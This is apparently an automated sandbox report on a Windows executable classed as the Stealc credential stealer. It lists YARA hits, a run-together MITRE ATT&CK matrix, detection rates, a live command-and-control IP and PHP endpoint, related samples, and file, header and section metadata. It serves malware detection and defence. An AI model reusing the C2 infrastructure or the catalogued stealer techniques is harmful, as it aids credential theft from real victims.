                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.48c0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    Create Account
                    11
                    Process Injection
                    1
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Process Injection
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS12
                    Process Discovery
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                    Software Packing
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem143
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    kNp6KbvVoz.exe74%ReversingLabsWin32.Trojan.Stealc
                    kNp6KbvVoz.exe61%VirustotalBrowse
                    kNp6KbvVoz.exe100%AviraHEUR/AGEN.1312567
                    kNp6KbvVoz.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                    http://194.15.46.65/7e57db3b864b30f1.php17%VirustotalBrowse
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://194.15.46.65/7e57db3b864b30f1.phptrueunknown
                    http://194.15.46.65/true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://194.15.46.65kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://upx.sf.netAmcache.hve.6.drfalse
                        • URL Reputation: safe
                        unknown
                        http://194.15.46.65/stemDrive=C:SystemRoot=LkNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://194.15.46.65/#Q-kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://194.15.46.65bkNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://194.15.46.65/_QkNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://194.15.46.65/#kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://194.15.46.65/DkNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://docs.rs/getrandom#nodejs-es-module-supportkNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    194.15.46.65
                                    unknownunknown
                                    20952VENUS-INTERNET-ASGBtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1544233
                                    Start date and time:2024-10-29 04:41:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 50s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:kNp6KbvVoz.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:0c6e0d5c6de6558eab55ce5fad0b8acd.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@2/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 36
                                    • Number of non-executed functions: 189
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    23:42:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    194.15.46.65uxnkmJzTjK.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65/
                                    jXMyT7jrfR.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65/7e57db3b864b30f1.php
                                    W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.15.46.65/7e57db3b864b30f1.php
                                    nGmqbXROga.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65/7f031eb0d257b290.php
                                    t4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.15.46.65/7f031eb0d257b290.php
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    VENUS-INTERNET-ASGBuxnkmJzTjK.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65
                                    jXMyT7jrfR.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65
                                    W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.15.46.65
                                    nGmqbXROga.exeGet hashmaliciousStealcBrowse
                                    • 194.15.46.65
                                    t4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                    • 194.15.46.65
                                    357oRnNepg.elfGet hashmaliciousUnknownBrowse
                                    • 217.138.142.250
                                    2jtSIERpll.elfGet hashmaliciousMiraiBrowse
                                    • 217.138.190.197
                                    luO0gwRNZ1.elfGet hashmaliciousMiraiBrowse
                                    • 217.138.190.173
                                    bPFO1DcK1x.elfGet hashmaliciousUnknownBrowse
                                    • 217.138.169.91
                                    KWnm2cUchM.elfGet hashmaliciousMiraiBrowse
                                    • 217.138.190.184
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9633936551253257
                                    Encrypted:false
                                    SSDEEP:192:6IKVdPJ1c08MZqdjMhZrMZtzuiFzZ24IO8P:DKVdPJ1X8MZqdjjTzuiFzY4IO8P
                                    MD5:399AC5DE8A76F66B80C2827EFC40E2AF
                                    SHA1:523E937676E6845F8C0E429973A0E33463383F35
                                    SHA-256:853A968BF1F668B138E52FA63B04FF07660645F93FDC477051C186992EE73922
                                    SHA-512:584F1DC5DFD8340024013DCD1FA4AD5508B67D601A4855CAD00DF702C8E3DD88CC96A49A793FC2A863E9B80B21395E3C7C80951EFD67EF305D6A86F76B5D6530
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.4.6.9.4.3.0.8.7.3.0.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.4.6.9.4.3.6.9.6.6.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.8.3.d.4.e.d.-.b.8.1.a.-.4.a.7.8.-.a.4.8.2.-.9.f.2.8.c.8.a.6.a.a.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.c.a.7.1.8.d.-.3.6.1.8.-.4.5.6.2.-.a.f.5.4.-.5.f.9.5.9.6.b.0.4.5.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.N.p.6.K.b.v.V.o.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.8.-.0.0.0.1.-.0.0.1.4.-.9.2.3.a.-.3.7.8.0.b.4.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.f.8.0.e.d.6.8.1.3.4.f.b.5.9.e.2.4.8.0.8.b.1.d.b.f.8.d.c.9.8.7.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.5.4.e.b.d.8.7.7.d.5.7.d.4.c.b.9.5.1.a.d.c.1.7.4.b.5.d.4.6.3.e.0.1.4.0.6.8.8.!.k.N.p.6.K.b.v.V.o.z...e.x.e.....T.a.r.g.e.t.A.p.p.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 29 03:42:23 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):113242
                                    Entropy (8bit):1.7161386176840059
                                    Encrypted:false
                                    SSDEEP:384:UzNxv26EEsZzxNB2o1Azxk7xyqcUL07cMX38sUgpZ+/I:U7v26EE4zxNB2o1gqcULe8szZF
                                    MD5:B557D8864F75E7699F39DF14074C1BDE
                                    SHA1:8707108E599EA5CBD3FC8DB3AC78709072EE6BD4
                                    SHA-256:26C053F8E07354F39A8C33B96208F979591C8E330326FB380C7F26D015AF5355
                                    SHA-512:091E051AF9956BE7311EB7E586E2B9BDE39FE2984E7645DDBDD9D52C4C82459F217A7C94853E633959EE8055CA6C3B06F295306B2524F03CD16FD35AEC816E69
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... ........Y g.........................................E..........T.......8...........T............3..............t...........` ..............................................................................eJ....... ......GenuineIntel............T............Y g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8350
                                    Entropy (8bit):3.69652775937798
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJLA6A6Y9pSU936gmfE5opDT89boBsfE4m:R6lXJM6A6YjSU936gmfE5Ro6fq
                                    MD5:740DB2199C64F0D306BC6664A450971D
                                    SHA1:0CFCC8A903E243B10C810F0C62EB35188D89D427
                                    SHA-256:E2A2334E02A7737DDED8DE64AE6D44E928D42624549B62BDA6FE3D593ADFDB36
                                    SHA-512:A8D6BE2D6AEDBF6B6B0191CDE505F995C2441F1345C8DB8C3E38B01FF4C13585070DE170BB19AD0372CA4E45226592BA295340D7016D4FD3F1DFEE13BDD3E172
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.0.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4583
                                    Entropy (8bit):4.4677163355026135
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsquJg77aI9gLWpW8VY+Ym8M4JPSeFUtKo+q87vzwl+ed:uIjflI7u67VmJPm9OLM+ed
                                    MD5:4F2DB436001E6D10BB54A7AFFB2AA430
                                    SHA1:AC8F5A6C89D5A46D2F927964FD4945FBD577457A
                                    SHA-256:31F241CBBCEAED594FAE1FA6E0D9B6F04E1B9AB206B3968F90C0BA916FC11DA5
                                    SHA-512:79531C744F1A2059E865B633409B90B3DA82A5190A0B86403725B6EA8155D3211EEB8BEB51B41C0D375C72B00FB3F34FC39337A6AE50E747A27927568326F8BC
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564165" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.465422378300488
                                    Encrypted:false
                                    SSDEEP:6144:ZIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSbe:qXD94+WlLZMM6YFHY+e
                                    MD5:CE00A016F38F83540C24D0CB3A849C38
                                    SHA1:1DB961BBD8AB2F456E4B5894EFCE2A24241D68AB
                                    SHA-256:0F9BCB94B5C04DC9796D087638CA84B287EA49011C783332263A00CCD9CB64A8
                                    SHA-512:7BEFA571D14CB8F88C3109A46C4D8008E37D8A474890C830B971E77781277B3109EC4A55D9F6BCB399ECE7A458DAAAB2B7FDA11B54AE883A9B9D4D6FC7043402
                                    Malicious:false
                                    Reputation:low
                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..R..)................................................................................................................................................................................................................................................................................................................................................E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.278367766463905
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:kNp6KbvVoz.exe
                                    File size:746'496 bytes
                                    MD5:0c6e0d5c6de6558eab55ce5fad0b8acd
                                    SHA1:7854ebd877d57d4cb951adc174b5d463e0140688
                                    SHA256:49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4
                                    SHA512:b9f5bb3942b093e48a16d7e556e2d145a7ce447e8fa789740772ac82719a5a0025121571750f8e7a30b30ea448dfc638d472d27680c61f02ce445bf39d5e051d
                                    SSDEEP:12288:dIAk5dkePe076dLUl2UL8ad53Kbp0auXd36ipkR0OhlPN5lYA5Ff7hA:sr76F8Pld8byL3zpkR0OhR3Ff7hA
                                    TLSH:E8F4DF5123F3EC06EEF68B715A3BC6F4252BBC625E3B526EB1043B1F19731A18951722
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7@..d@..d@..d..3dB..d^.!da..d^.0dT..d^.&d1..dg5.dE..d@..d=..d^./dA..d^.1dA..d^.4dA..dRich@..d................PE..L....=.f...
                                    Icon Hash:3518151211911409
                                    Entrypoint:0x4017bc
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66093DDC [Sun Mar 31 10:41:32 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:774b9ee29865bc65243d048a6e76d9ed
                                    Instruction
                                    call 00007F3378F56990h
                                    jmp 00007F3378F526CEh
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov dword ptr [0048FE40h], eax
                                    mov dword ptr [0048FE3Ch], ecx
                                    mov dword ptr [0048FE38h], edx
                                    mov dword ptr [0048FE34h], ebx
                                    mov dword ptr [0048FE30h], esi
                                    mov dword ptr [0048FE2Ch], edi
                                    mov word ptr [0048FE58h], ss
                                    mov word ptr [0048FE4Ch], cs
                                    mov word ptr [0048FE28h], ds
                                    mov word ptr [0048FE24h], es
                                    mov word ptr [0048FE20h], fs
                                    mov word ptr [0048FE1Ch], gs
                                    pushfd
                                    pop dword ptr [0048FE50h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [0048FE44h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [0048FE48h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [0048FE54h], eax
                                    mov eax, dword ptr [ebp-00000320h]
                                    mov dword ptr [0048FD90h], 00010001h
                                    mov eax, dword ptr [0048FE48h]
                                    mov dword ptr [0048FD44h], eax
                                    mov dword ptr [0048FD38h], C0000409h
                                    mov dword ptr [0048FD3Ch], 00000001h
                                    mov eax, dword ptr [0048C004h]
                                    mov dword ptr [ebp-00000328h], eax
                                    mov eax, dword ptr [0048C008h]
                                    mov dword ptr [ebp-00000324h], eax
                                    call dword ptr [000000ECh]
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [ C ] VS2008 build 21022
                                    • [IMP] VS2005 build 50727
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8a9ac0x3c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x27950000x24e28.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x890000x1bc.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x8755c0x87600964bd6b70c73731a8c90838b8e2a2cefFalse0.9220120614035088data7.843773564734436IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x890000x23d80x2400c3529c9eb2946064b6b1ced13b8721c7False0.3800998263888889data5.648685953733001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x8c0000x2703b580x3e00b779438e1964d6135c57a8c6d76b106cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pewume0x27900000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x27950000x24e280x25000add7adcbffd214436296c1afa6b85551False0.3869364970439189data4.867381185850408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    MACEJUMANISESIHEPUTUZALUPASAJ0x27ad7a80xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6030035912504081
                                    RT_CURSOR0x27ae3c80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                    RT_CURSOR0x27ae4f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                    RT_CURSOR0x27b0ac80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                    RT_CURSOR0x27b19880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                    RT_CURSOR0x27b1ab80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                    RT_ICON0x2795c800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5583688699360341
                                    RT_ICON0x2796b280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6272563176895307
                                    RT_ICON0x27973d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.668778801843318
                                    RT_ICON0x2797a980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7398843930635838
                                    RT_ICON0x27980000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.499896265560166
                                    RT_ICON0x279a5a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5949812382739212
                                    RT_ICON0x279b6500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5897540983606557
                                    RT_ICON0x279bfd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7296099290780141
                                    RT_ICON0x279c4b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3334221748400853
                                    RT_ICON0x279d3600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.3935018050541516
                                    RT_ICON0x279dc080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3980414746543779
                                    RT_ICON0x279e2d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4067919075144509
                                    RT_ICON0x279e8380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22022821576763485
                                    RT_ICON0x27a0de00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.25023452157598497
                                    RT_ICON0x27a1e880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28032786885245903
                                    RT_ICON0x27a28100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3076241134751773
                                    RT_ICON0x27a2cf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.38832622601279315
                                    RT_ICON0x27a3b980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.546028880866426
                                    RT_ICON0x27a44400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6111751152073732
                                    RT_ICON0x27a4b080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6307803468208093
                                    RT_ICON0x27a50700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.40783302063789867
